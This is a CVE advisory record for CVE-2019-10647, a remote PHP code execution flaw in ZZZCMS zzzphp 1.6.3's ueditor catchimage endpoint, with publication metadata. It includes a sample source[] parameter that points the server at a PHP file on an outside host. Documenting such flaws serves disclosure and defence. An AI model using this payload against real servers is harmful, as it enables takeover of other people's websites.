ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).
Metrics
Affected Vendors & Products
References
History
No history.

Status: PUBLISHED
Assigner: mitre
Published:
Updated: 2024-08-04T22:32:00.646Z
Reserved: 2019-03-30T00:00:00
Link: CVE-2019-10647

No data.

Status : Modified
Published: 2019-03-30T13:29:00.467
Modified: 2024-11-21T04:19:39.917
Link: CVE-2019-10647

No data.